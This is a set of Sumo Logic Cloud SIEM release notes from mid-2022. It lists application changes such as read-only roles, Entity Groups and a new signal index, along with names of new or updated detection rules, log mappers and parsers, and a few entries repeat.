  • [New] /Parsers/System/Cisco/Cisco ISE
  • [New] /Parsers/System/FireEye/FireEye Web MPS JSON

August 18, 2022 - Application Update

Resolved Issues

  • Several issues were resolved related to the bulk upload of Entity attributes, including errors with CSV file parsing, editing uploaded attributes in the UI, and a lack of audit logging.
  • On the Entity details page, the criticality was not being displayed properly. Labels were not being created properly based on Network Blocks for a small number of customers.
  • InsightCommentCreated audit events did not include the readableId attribute.
  • For some record types, the Actions field was not being displayed if selected as a favorite field.

July 28, 2022 - Application Update

Read-Only User Capabilities for Cloud SIEM

New user capabilities (permissions) have been created enabling read-only access to content and configuration features in Cloud SIEM.

These can be used when defining roles in the Sumo Logic platform (at Administration > Users and Roles > Roles).

read-only roles

(For those with Cloud SIEM instances in the jask.ai domain, these capabilities are accessed via the Configuration > Roles page in Cloud SIEM.)

Users with these capabilities (without the corresponding Manage capabilities) will be able to view the corresponding pages but will not be able to make changes on those pages. (Previously, users without the Manage capabilities could not see the corresponding pages.)

These permissions also apply to Cloud SIEM APIs, so View (only) capabilities can now be assigned if desired.

Minor Changes and Enhancements

  • [Updated] When Threat Intelligence polling fails, the corresponding event will now include more information about the specific error that occurred.
  • [Updated] The API endpoints that return information about Signals (GET /signals, GET /signals/<id>, and GET /signals/all) now include the summary field (previously only accessible via the UI).
  • [New] The Sumo Logic audit logs will now include events when a user adds or removes a Signal to/from an Insight, and when a user adds a comment to an Insight.

Resolved Issues

  • The GET /rules and GET /rules/<id> API endpoints did not require role capabilities for access; they now require either View Rules or Manage Rules.
  • Favorite Fields were not always being displayed on Signals generated by Threshold Rules.

July 14, 2022 - Application Update

Minor Changes and Enhancements

  • [Updated] The text size has been adjusted in some areas on the Rules details page to improve readability.

Resolved Issues

  • In some instances, after uploading Network Blocks via .csv file, they would fail to appear in the UI.
Announcement Update
  • The new Signal Index (recently announced) has been delayed, and will be available starting next week. As a result, the deprecation of the old Signal Forwarding feature will be delayed until September 22, 2022.

July 21 - Application Update

Entity Groups

There are a number of ways that the use of Entity attributes - tags, criticality and suppression - provide value to users of Cloud SIEM: Investigations can be completed faster with more context, Insights can be better prioritized with the appropriate severity, and false positive signals from test instances can be prevented, for example. However, setting those attributes has been a manual process and keeping them in sync as new Entities are defined is difficult.

That's why we are pleased to announce a new feature called Entity Groups. By defining Entity Groups, attributes can be automatically applied (or removed) based on Entity value (name), IP address, or Inventory group membership. For example, all high-risk laptops will receive higher criticality -- even if such a laptop is added to your environment months later.

Entities can even be members of more than one Entity Group, so a high-risk laptop in the Austin office could both get a tag identifying its location and receive the higher criticality. And if you later reassigned it so that it was no longer in a high-risk group, the criticality would be automatically removed.

To create an Entity Group, a new configuration menu item has been added:

entity groups menu

On the Entity Groups page, click the Create button:

entity groups list

This will open the detail dialog:

create entity group

Here you can decide what attribute Group membership should be based on:

  • Group membership in your Inventory system (such as Active Directory)
  • Entity value (name) - prefix or suffix (such as "aus-" or "-public")
  • IP address range (for IP Address entities) defined using the CIDR format

Entity Groups also support sensor zones.

Then you can define what attribute(s) should be applied to member Entities - tags, criticality and/or suppression.

This release also includes API and Terraform support for Entity Groups.

More information about this exciting new feature and how to use it is in the documentation at Using Entity Groups.

Signal Index

Starting today, Signals generated by Cloud SIEM will be automatically saved in a new sec_signal index. This special partition is similar to the existing sec_record_* indices in that, unlike data retained using the older Signal Forwarding feature, it will be saved in proper JSON supporting keyword search and nested attributes.

The new index is automatically generated and retained for a period of 2 years at no additional cost for all Cloud SIEM customers.

As a result, the optional Signal Forwarding feature will be deprecated on September 22, 2022. Existing data will not be deleted but new Signals generated after that date will no longer be forwarded and the option will no longer be available in Cloud SIEM.

Customers leveraging Signal Forwarding data to generate dashboards (or for other use cases) will need to modify those applications to use the new sec_signal index before September 22.

Note that because the new index is a special partition, a single query cannot be used to search both the sec_signal index and older forwarded Signal data simultaneously.

More information about using the special security indices is in the documentation at Searching for Cloud SIEM Data in Sumo Logic.

Minor Changes and Enhancements

  • [Updated] The page used to configure the detection window and Insight threshold has moved. Where previously it was accessed from a button on the Custom Insights list page, it is now accessed via a new Workflow > Detection option in the Configuration menu:
threshold menu

Note the URL has also changed as a result; please update any bookmarks.

Resolved Issues

When navigating to a Cloud SIEM page (with sumologic.com in the domain name), if the user had to login/authenticate first, they were not auto-forwarded to the appropriate Cloud SIEM page after doing so (but instead was taken to the Continuous Intelligence Platform home page). This has now been resolved and users will be auto-forwarded correctly.


July 21, 2021 - Content Release

Rules

  • [Updated] MATCH-S00587 Empire PowerShell Launch Parameters
  • [Updated] MATCH-S00161 Malicious PowerShell Get Commands
  • [Updated] MATCH-S00190 Malicious PowerShell Invoke Commands
  • [Updated] MATCH-S00191 Suspicious PowerShell Keywords

Log Mappers

  • [New] OSSEC Alert

Parsers

  • [New] /Parsers/System/OSSEC/OSSEC JSON
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
  • [Updated] /Parsers/System/Kubernetes/Kubernetes
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

July 14, 2022 - Application Update

Minor Changes and Enhancements

  • [Updated] The text size has been adjusted in some areas on the Rules details page to improve readability.

Resolved Issues

  • In some instances, after uploading Network Blocks via .csv file, they would fail to appear in the UI.

Announcement Update

The new Signal Index (previously announced) has been delayed, and will be available starting next week. As a result, the deprecation of the old Signal Forwarding feature will be delayed until September 22, 2022.


July 14 - Content Release

Log Mappers

  • [New] Carbon Black Cloud Alert - Tuned Activity
  • [Updated] Cisco ASA 106001 JSON
  • [Updated] Cisco ASA 106002 JSON
  • [Updated] Cisco ASA 106006 JSON
  • [Updated] Cisco ASA 106007 JSON
  • [Updated] Cisco ASA 106010 JSON
  • [Updated] Cisco ASA 106012 JSON
  • [Updated] Cisco ASA 106014 JSON
  • [Updated] Cisco ASA 106015 JSON
  • [Updated] Cisco ASA 106021 JSON
  • [Updated] Cisco ASA 106027 JSON
  • [Updated] Cisco ASA 106100 JSON
  • [Updated] Cisco ASA 106102-3 JSON
  • [Updated] Cisco ASA 109005-8 JSON
  • [Updated] Cisco ASA 110002 JSON
  • [Updated] Cisco ASA 113004 JSON
  • [Updated] Cisco ASA 113005 JSON
  • [Updated] Cisco ASA 113012-17 JSON
  • [Updated] Cisco ASA 209004 JSON
  • [Updated] Cisco ASA 302020-1 JSON
  • [Updated] Cisco ASA 303002 JSON
  • [Updated] Cisco ASA 304001 JSON
  • [Updated] Cisco ASA 304002 JSON
  • [Updated] Cisco ASA 305011-12 JSON
  • [Updated] Cisco ASA 313001 JSON
  • [Updated] Cisco ASA 313004 JSON
  • [Updated] Cisco ASA 313005 JSON
  • [Updated] Cisco ASA 314003 JSON
  • [Updated] Cisco ASA 322001 JSON
  • [Updated] Cisco ASA 338001-8+338201-4 JSON
  • [Updated] Cisco ASA 4000nn JSON
  • [Updated] Cisco ASA 406001 JSON
  • [Updated] Cisco ASA 406002 JSON
  • [Updated] Cisco ASA 419001 JSON
  • [Updated] Cisco ASA 419002 JSON
  • [Updated] Cisco ASA 500004 JSON
  • [Updated] Cisco ASA 602303-4 JSON
  • [Updated] Cisco ASA 605004-5 JSON
  • [Updated] Cisco ASA 710002-3 JSON
  • [Updated] Cisco ASA 710005 JSON
  • [Updated] Cisco ASA tcp_udp_sctp_teardowns JSON

Parsers

  • [Updated] /Parsers/System/VMware/Carbon Black Cloud
  • [Updated] /Parsers/System/Cisco/Cisco ASA

July 8, 2022 - Application Update

Announcement

  • The built-in HipChat Action will be **deprecated **on August 25, 2022.

Minor Changes and Enhancements

  • [Updated] An option has been added to the Enrichments tab which allows the user to hide any empty fields in the results.

Resolved Issues

  • In some cases, changes to Rule Tuning Expressions were not being written to the Audit Logs properly.
  • Mapper field format_parameters was not populating.
  • Some of the links on the Related Entities tab of the Insight detail pages were malformed.

July 8, 2022 - Application Update

Announcement

The built-in HipChat Action will be deprecated on August 25, 2022.

Minor Changes and Enhancements

  • [Updated] An option has been added to the Enrichments tab which allows the user to hide any empty fields in the results.

Resolved Issues

In some cases, changes to Rule Tuning Expressions were not being written to the Audit Logs properly.


July 7, 2022 - Content Release

Rules

  • [New] MATCH-S00816 Interactive Logon to Domain Controller

Log Mappers

  • [Updated] Palo Alto GlobalProtect - Custom Parser
  • Updated] Palo Alto GlobalProtect Auth - Custom Parser
  • [Updated] Windows - System - 7045
  • [Updated] Zscaler - Nanolog Streaming Service - JSON

Parsers

  • [Updated] /Parsers/System/F5/F5 Syslog
  • [Updated] /Parsers/System/Google/GCP
  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00099 Long URL Containing SQL Commands
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force
  • [Updated] MATCH-S00185 Windows - Remote System Discovery

July 5, 2022 - Content Release

Rules

  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00099 Long URL Containing SQL Commands
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force
  • [Updated] MATCH-S00185 Windows - Remote System Discovery

Log Mappers

  • [Updated] McAfee Endpoint Security Custom Parser
  • [Updated] Microsoft SQL Server Parser - Authentication

Parsers

  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/McAfee/McAfee EPO XML
  • [Updated] /Parsers/System/Microsoft/Microsoft SQL Server
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV
  • [Updated] /Parsers/System/Twistlock/Twistlock

June 24, 2022 - Announcement

Beginning July 15, 2022, Signals generated by Cloud SIEM will be automatically saved in a new sec_signals index. This index/special partition will be similar to the existing sec_record_ indices in that, unlike data retained using the older Signal Forwarding feature, it will be saved in proper JSON supporting keyword search and nested attributes.

The new index will be automatically generated and retained for a period of 2 years at no additional cost for all Cloud SIEM customers.

As a result, the optional Signal Forwarding feature in Cloud SIEM will be deprecated on September 15, 2022. Existing data will not be deleted but new Signals generated after that date will no longer be forwarded and the option will no longer be available in Cloud SIEM.

Customers leveraging Signal Forwarding data to generate dashboards (or for other use cases) will need to modify those applications to use the new sec_signals index before September 15.

If you have any questions or concerns, please contact Sumo Logic customer support.


June 24, 2022 - Application Update

Minor Changes and Enhancements

  • [New] On the Insight details pages, if the user has selected the Show Related Signals option, the related Signals will appear on the Signals Timeline graph.

Resolved Issues

  • The /sec/v1/insights/{}/tags API endpoint was returning a 500/INTERNAL_SERVER_ERROR.

June 21, 2022 - Content Release

Log Mappers

  • [Updated] McAfee Avecto Defendpoint

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/McAfee/McAfee EPO XML

June 15, 2022 - Content Release

Rules

  • [Updated] MATCH-S00400 Web Download via Office Binaries

Log Mappers

  • [New] GCP Parser - Load Balancer

Parsers

  • [Updated] /Parsers/System/Google/GCP
  • [Updated] /Parsers/System/Orca Security/Orca Security
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

June 13, 2022 Application Update

Minor Changes and Enhancements

  • [Updated] List filters have been updated to better support custom Entity types; users no longer have to specify the Entity type in order to filter by Entity value (i.e. name). (Old bookmark will continue to work.)
  • [Updated] On the Insight Details pages, the sort order for Signals has been reverted to oldest first. As always, the user can change the sort order and in an upcoming release, the UI will be updated to retain the user's selected sort order across sessions.
  • [Deleted] The standalone Suppressed Entities list page has been removed from the UI as it was confusing to users. To retrieve a list of suppressed Entities, users should filter the Entities list page.

Resolved Issues

  • CSV upload for Network Blocks was not working unless the (optional) "label" field was provided.
  • Then filtering lists by date, the "include current" checkbox was not working consistently.

June 9, 2022 - Content Release

Rules

  • [New] MATCH-S00815 Threat Intel - Successful Authentication from Threat IP
  • [Updated] MATCH-S00687 Linux Security Tool Usage
  • [Updated] MATCH-S00555 Threat Intel - Inbound Traffic Context

Log Mappers

  • [Updated] Cyber Ark Vault JSON

Parsers

  • [New] /Parsers/System/Cyber-Ark/Cyber-Ark Vault - CEF
  • [Updated] /Parsers/System/AWS/AWS ELB
  • [Updated] /Parsers/System/AWS/AWS WAF

June 7, 2022 - Content Release 2022-06-07

Rules

  • [Updated] MATCH-S00814 Abnormal Child Process - sdiagnhost.exe - CVE-2022-30190
  • [Updated] MATCH-S00147 WMI Managed Object Format (MOF) Process Execution

Log Mappers

  • [New] Bitdefender - avc
  • [New] Bitdefender - fw
  • [New] Bitdefender - hd
  • [New] Bitdefender - network-monitor
  • [New] Bitdefender - new-incident
  • [New] Linux OS Syslog - Cron - Generic
  • [New] Linux OS Syslog - sshd - session timeout
  • [Updated] Bitdefender Catch All
  • [Updated] SonicWall Firewall - Custom Parser

Parsers

  • [Updated] /Parsers/System/Dell/Dell SonicWall
  • [Updated] /Parsers/System/Linux/Linux OS Syslog

June 3, 2022 - Content Release

Rules

  • [New] MATCH-S00814 Abnormal Child Process - sdiagnhost.exe - CVE-2022-30190
  • [New] MATCH-S00813 Microsoft Support Diagnostic Tool Invoking PowerShell - CVE-2022-30190
  • [New] MATCH-S00812 Microsoft Support Diagnostic Tool with BrowseForFile - CVE-2022-30190
  • [Updated] THRESHOLD-S00080 Internal Port Scan
  • [Updated] MATCH-S00811 MS Office Product Spawning Msdt.exe - CVE-2022-30190

Log Mappers

  • [New] Google G Suite - logout
  • [New] McAfee Mvision ENS incidents - Parser
  • [New] McAfee Mvision ENS threats - Parser
  • [New] Okta Authentication - auth_via_AD_agent
  • [New] Okta Authentication - auth_via_mfa
  • [New] Okta Authentication - auth_via_radius
  • [New] Okta Authentication - sso
  • [Updated] Google G Suite - login.login
  • [Updated] Okta Authentication Events
  • [Updated] Salesforce LoginAs Mapping

Parsers

  • [New] /Parsers/System/McAfee/McAfee Mvision ENS

Schema

  • [Updated] device_ip_asnNumber
  • [Updated] device_ip_asnOrg
  • [Updated] device_ip_city
  • [Updated] device_ip_countryCode
  • [Updated] device_ip_countryName
  • [Updated] device_ip_isp
  • [Updated] device_ip_latitude
  • [Updated] device_ip_longitude
  • [Updated] device_ip_region
  • [Updated] device_natIp_asnNumber
  • [Updated] device_natIp_asnOrg
  • [Updated] device_natIp_city
  • [Updated] device_natIp_countryCode
  • [Updated] device_natIp_countryName
  • [Updated] device_natIp_isp
  • [Updated] device_natIp_latitude
  • [Updated] device_natIp_longitude
  • [Updated] device_natIp_region
  • [Updated] dns_replyIp_asnNumber
  • [Updated] dns_replyIp_asnOrg
  • [Updated] dns_replyIp_city
  • [Updated] dns_replyIp_countryCode
  • [Updated] dns_replyIp_countryName
  • [Updated] dns_replyIp_isp
  • [Updated] dns_replyIp_latitude
  • [Updated] dns_replyIp_longitude
  • [Updated] dns_replyIp_region
  • [Updated] dstDevice_ip_asnNumber
  • [Updated] dstDevice_ip_asnOrg
  • [Updated] dstDevice_ip_city
  • [Updated] dstDevice_ip_countryCode
  • [Updated] dstDevice_ip_countryName
  • [Updated] dstDevice_ip_isp
  • [Updated] dstDevice_ip_latitude
  • [Updated] dstDevice_ip_longitude
  • [Updated] dstDevice_ip_region
  • [Updated] srcDevice_ip_asnNumber
  • [Updated] srcDevice_ip_asnOrg
  • [Updated] srcDevice_ip_city
  • [Updated] srcDevice_ip_countryCode
  • [Updated] srcDevice_ip_countryName
  • [Updated] srcDevice_ip_isp
  • [Updated] srcDevice_ip_latitude
  • [Updated] srcDevice_ip_longitude
  • [Updated] srcDevice_ip_region

June 1, 2022 - Announcement

Geographical Data for IP Addresses

  • As previously announced, Cloud SIEM has switched to a new provider for geographical data for IP addresses. One consequence of this change is that the various _isp enrichment fields (listed below) are no longer being populated. However, that data is available in the equivalent _asnOrg fields (such as device_ip_asnOrg). If you have any rules that leverage the _isp fields, please switch to the _asnOrg fields as soon as possible.
  • Because these fields will no longer be populated, they will be removed on June 7, 2022:
    • device_ip_isp
    • device_natIp_isp
    • device_replyIp_isp
    • dstDevice_ip_isp
    • dstDevice_natIp_isp
    • srcDevice_ip_isp
    • srcDevice_natIp_isp

May 31, 2022 - Content Release

Rules

  • [New] MATCH-S00811 MS Office Product Spawning Msdt.exe - CVE-2022-30190
  • [Updated] MATCH-S00612 GCP Audit Secrets Manager Activity
  • [Updated] MATCH-S00766 Okta MFA Deactivated for User
  • [Updated] THRESHOLD-S00101 Sharepoint - Excessive Documents Accessed
  • [Updated] THRESHOLD-S00100 Sharepoint - Excessive Documents Downloaded

Log Mappers

  • [New] Aruba ClearPass User Authentication Failed
  • [New] Aruba ClearPass User Authentication Successful
  • [New] Cisco Secure Email Parser - Catch All
  • [New] Exabeam Parser - Catch All
  • [New] Jamf Parser - Catch All
  • [New] Juniper SRX Series Firewall - Parser
  • [New] McAfee Network Security Parser - Catch All
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft 365 Defender
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft IPC
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft Office 365 Security and Compliance
  • [New] Orca Security Parser - Catch All
  • [New] Squid Proxy - Parser
  • [New] Thinkst Canary Parser - Catch All
  • [New] Zscaler Workload Segmentation Catch All - Parser
  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - CreateTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - DeleteTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StartLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StopLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - UpdateTrail
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - AttachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - AuthorizeSecurityGroupIngress
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DetachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - ImportKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclAssociation
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclEntry
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - AttachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreateAccessKey
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicyVersion
  • [Updated] CloudTrail - iam.amazonaws.com - CreateUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeletePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - UpdateAssumeRolePolicy
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - kms.amazonaws.com - ScheduleKeyDeletion
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogGroup
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - CheckMfa
  • [Updated] CloudTrail - signin.amazonaws.com - ConsoleLogin
  • [Updated] CloudTrail - signin.amazonaws.com - ExitRole
  • [Updated] CloudTrail - signin.amazonaws.com - RenewRole
  • [Updated] CloudTrail - signin.amazonaws.com - SwitchRole
  • [Updated] CloudTrail - sso.amazonaws.com - Federate
  • [Updated] CloudTrail - sso.amazonaws.com - ListProfilesForApplication
  • [Updated] CloudTrail Default Mapping
  • [Updated] Cloudflare - Logpush
  • [Updated] Egnyte DLP Parser - Catch All
  • [Updated] Linux OS Syslog - Process kernel - Promiscuous Mode Change
  • [Updated] Okta Authentication Events
  • [Updated] Okta Catch All
  • [Updated] Okta Security Threat Events
  • [Updated] Windows - Security - 4688

Parsers

  • [New] /Parsers/System/Cisco/Cisco Secure Email
  • [New] /Parsers/System/Exabeam/Exabeam Security Management Platform (SMP) Syslog
  • [New] /Parsers/System/Jamf/Jamf
  • [New] /Parsers/System/Juniper/Juniper SRX Series Firewall Syslog
  • [New] /Parsers/System/McAfee/McAfee Network Security
  • [New] /Parsers/System/Orca Security/Orca Security
  • [New] /Parsers/System/Squid/Squid Proxy Syslog
  • [New] /Parsers/System/Thinkst Canary/Thinkst Canary
  • [New] /Parsers/System/Zscaler/Zscaler Workload Segmentation/Zscaler Workload Segmentation JSON
  • [Updated] /Parsers/System/HP/Aruba ClearPass - Syslog
  • [Updated] /Parsers/System/CrowdStrike/CrowdStrike Falcon Endpoint - JSON
  • [Updated] /Parsers/System/Egnyte/Egnyte DLP
  • [Updated] /Parsers/System/F5/F5 Syslog
  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV
  • [Updated] /Parsers/System/Shared/Syslog Headers
  • [Updated] /Parsers/System/Twistlock/Twistlock

May 27, 2022 - Application Update

Upcoming Changes

  • [Updated] Starting later next week, the severity attribute in audit log records for Insights (such as InsightCreated) will be changing. Instead of a number (represented as a string) from 1 to 4, the value will be a human-readable string matching the values in the UI (LOW, MEDIUM, HIGH, CRITICAL). Please update any dashboards or other consumers of this data.
  • [Deleted] Later next week, the **Content **> **Suppressed Entities **page will be removed from the UI to simplify the application. Instead, users can use a filter on the **Content **> **Entities **page to retrieve the list of suppressed Entities.

Minor Changes and Enhancements

  • [Updated] On the Insight Details pages, Signals are now sorted in order of the most recent Signal first by default. (As always, the user can change the sort order.)
  • [New] When creating a copy of a Rule, users are now given then option to apply the Rule Tuning Expression(s) that are applied on the original rule to the copy as well.
  • [New] In the Cloud SIEM UI, timestamps now explicitly include the time zone.
  • [New] Users can now specify a maximum look-back window (in days) for TAXII feeds.
  • [New] The current status (enabled/disabled) for each feed is now displayed on the Threat Intelligence list page.

Resolved Issues

  • If a user had defined a high number of favorite fields, the system would show the first 50.
  • When specifying tags, the auto-complete feature was not working properly in some instances.

May 26, 2022 - Content Release

Rules

  • [Updated] MATCH-S00612 GCP Audit Secrets Manager Activity
  • [Updated] THRESHOLD-S00101 Sharepoint - Excessive Documents Accessed
  • [Updated] THRESHOLD-S00100 Sharepoint - Excessive Documents Downloaded

Log Mappers

  • [New] Cisco Secure Email Parser - Catch All
  • [New] Exabeam Parser - Catch All
  • [New] Jamf Parser - Catch All
  • [New] Juniper SRX Series Firewall - Parser
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft 365 Defender
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft IPC
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft Office 365 Security and Compliance
  • [New] Squid Proxy - Parser
  • [New] Thinkst Canary Parser - Catch All
  • [New] Zscaler Workload Segmentation Catch All - Parser
  • [Updated] Egnyte DLP Parser - Catch All
  • [Updated] Linux OS Syslog - Process kernel - Promiscuous Mode Change

Parsers

  • [New] /Parsers/System/Cisco/Cisco Secure Email
  • [New] /Parsers/System/Exabeam/Exabeam Security Management Platform (SMP) Syslog
  • [New] /Parsers/System/Jamf/Jamf
  • [New] /Parsers/System/Juniper/Juniper SRX Series Firewall Syslog
  • [New] /Parsers/System/Squid/Squid Proxy Syslog
  • [New] /Parsers/System/Thinkst Canary/Thinkst Canary
  • [New] /Parsers/System/Zscaler/Zscaler Workload Segmentation/Zscaler Workload Segmentation JSON
  • [Updated] /Parsers/System/CrowdStrike/CrowdStrike Falcon Endpoint - JSON
  • [Updated] /Parsers/System/Egnyte/Egnyte DLP
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

May 17, 2022 - Application Update

Minor Changes and Enhancements

  • [Updated] The _sourceName and _sourceHost values in records ingested by Cloud SIEM will now reflect the original values defined when ingested into the Sumo Logic platform.
  • [Updated] The "Board" list view for Insights has been updated to include the resolution:

board-view

Resolved Issues

  • In the new Entities tab in Insights, duplicate Entities were sometimes listed if the raw and normalized names didn't match. Also, the cards will now respond better to very low screen/browser widths.
  • When viewing some verbose content (like Record properties), mousing over the content would cause it to reflow.
  • When creating match list items via Terraform, the process was occasionally timing out.
  • Email-based actions were not functioning properly on instances with domains ending in jask.ai.

May 12, 2022 - Content Release

Rules

  • [Updated] LEGACY-S00078 SQL Injection Victim

Log Mappers

  • [New] Check Point Application Control
  • [New] Check Point SmartDefense
  • [New] Check Point URL Filtering
  • [Updated] Check Point Block

Parsers

  • [Updated] /Parsers/System/Check Point/Check Point Firewall JSON
  • [Updated] /Parsers/System/Check Point/Check Point Firewall Syslog
  • [Updated] /Parsers/System/Microsoft/Office 365

May 10, 2022 - Content Release

Rules

  • [Deleted] MATCH-S00258 Authentication Brute Force Attempt
  • [Updated] MATCH-S00176 RDP Login from Localhost

Log Mappers

  • [Deleted] Windows - Microsoft-Windows-PowerShell/Operational - 4103 - CIP
  • [Deleted] Windows - Microsoft-Windows-PowerShell/Operational - 4104 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 1 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 10 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 11 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 12, 13, and 14 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 15 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 2 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 3 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 4 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 5 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 6 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 8 - CIP
  • [Deleted] Windows - Security - 1100 - CIP
  • [Deleted] Windows - Security - 1102 - CIP
  • [Deleted] Windows - Security - 4624 - CIP
  • [Deleted] Windows - Security - 4625 - CIP
  • [Deleted] Windows - Security - 4634 - CIP
  • [Deleted] Windows - Security - 4648 - CIP
  • [Deleted] Windows - Security - 4649 - CIP
  • [Deleted] Windows - Security - 4656 - CIP
  • [Deleted] Windows - Security - 4658 - CIP
  • [Deleted] Windows - Security - 4661 - CIP
  • [Deleted] Windows - Security - 4662 - CIP
  • [Deleted] Windows - Security - 4663 - CIP
  • [Deleted] Windows - Security - 4672 - CIP
